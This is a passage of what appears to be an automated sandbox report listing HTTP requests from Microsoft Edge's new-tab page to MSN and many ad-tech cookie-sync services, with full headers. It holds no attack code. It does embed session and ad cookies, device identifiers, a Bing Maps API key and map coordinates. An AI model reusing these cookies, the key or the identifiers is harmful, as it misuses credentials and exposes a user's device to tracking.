MUIDB=1CEEFCDF50C667711B38E95B514A66A6; MicrosoftApplicationsTelemetryDeviceId=4e7f250b-0d09-4996-9293-879c31dce511If-None-Match: 0x8DD40A9D9B7D817If-Modified-Since: Wed, 29 Jan 2025 21:14:00 GMT
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=c6706130-fb7d-447f-8fbe-47810dfa3fd0&ii=1&c=6988144553414921538&bid=094657a1-39df-433d-9d2c-a24746fb158d&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=1CEEFCDF50C667711B38E95B514A66A6&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /edge/ntp?form=MT004B&OCID=MT004B&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004BAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; _C_Auth=; pglt-edgeChromium-ntp=2083; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D; sptmarket=en-gb||us|en-us|en-us|en||cf=8|RefA=68582199850E45B7AD01A954E30970E7.RefC=2025-01-30T17:11:30Z; MUID=1CEEFCDF50C667711B38E95B514A66A6; MUIDB=1CEEFCDF50C667711B38E95B514A66A6; MicrosoftApplicationsTelemetryDeviceId=4e7f250b-0d09-4996-9293-879c31dce511
                Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=1CEEFCDF50C667711B38E95B514A66A6&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /mapuid?suid=1CEEFCDF50C667711B38E95B514A66A6&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=1CEEFCDF50C667711B38E95B514A66A6;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D1CEEFCDF50C667711B38E95B514A66A6%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=1CEEFCDF50C667711B38E95B514A66A6&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D1CEEFCDF50C667711B38E95B514A66A6%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D1CEEFCDF50C667711B38E95B514A66A6%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; receive-cookie-deprecation=1; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /cs/msn?id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=3316665501207546191272
                Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /cs/msn?id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D1CEEFCDF50C667711B38E95B514A66A6%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; receive-cookie-deprecation=1; uuid2=3155402569559599506; anj=dTM7k!M4/8CxrEQF']wIg2HaOv]10$!@wnf-Te9(>wL5L!!'cx$uOCP
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=a1f4bbd0-e36a-4a8f-ac68-191af04c08d5&ii=1&c=8763910094378027791&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=4bb7198f-14c9-4450-9e26-4f48f59db57d&ii=1&c=6406448989463982608&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=15&p=edgechrntp&l=en-us&d=bing&b=Edg&a=fd76fd16-5f73-440a-8379-b066de8b4f6b&ii=1&c=16911259267028252668&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-3&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; anj=dTM7k!M4/8CxrEQF']wIg2HaOv]10$!@wnf-Te9(>wL5L!!'cx$uOCP; XANDR_PANID=WJXBekwcJT0bccRPhaYaREpd6oIqeLIqedGO6X_Tela7cJJi0phDolSohAU1W6yYhudSUPQh_ICU22laJglkAl3bE4PCgVOZoISmPsM9oNM.; uuid2=7867459490243587647
                Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=db758dc6-c3af-4394-858b-b90f5ec7df6c&ii=1&c=17535824647884098113&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; anj=dTM7k!M4/8D>6NRF']wIg2HaOv]10$!EKw)06K+2*qF1`*bdoU%xwz:; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /REST/v1/Imagery/Map/RoadVibrant/40.7348,-73.9213/13?ms=266,192&ml=Basemap,OsmBuildings,TrafficFlow&key=AoyTpSR4rZ82ACunlVljE1ihA5yanCDx6D-acnj31k3Qp4hmUjE-uBGXnMPa1L94&c=en-us&fmt=png&od=1&logo=n&da=ro&maxAge=1200&pushpin=40.734846,-73.921346;acd.f HTTP/1.1Host: ecn-us.dev.virtualearth.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
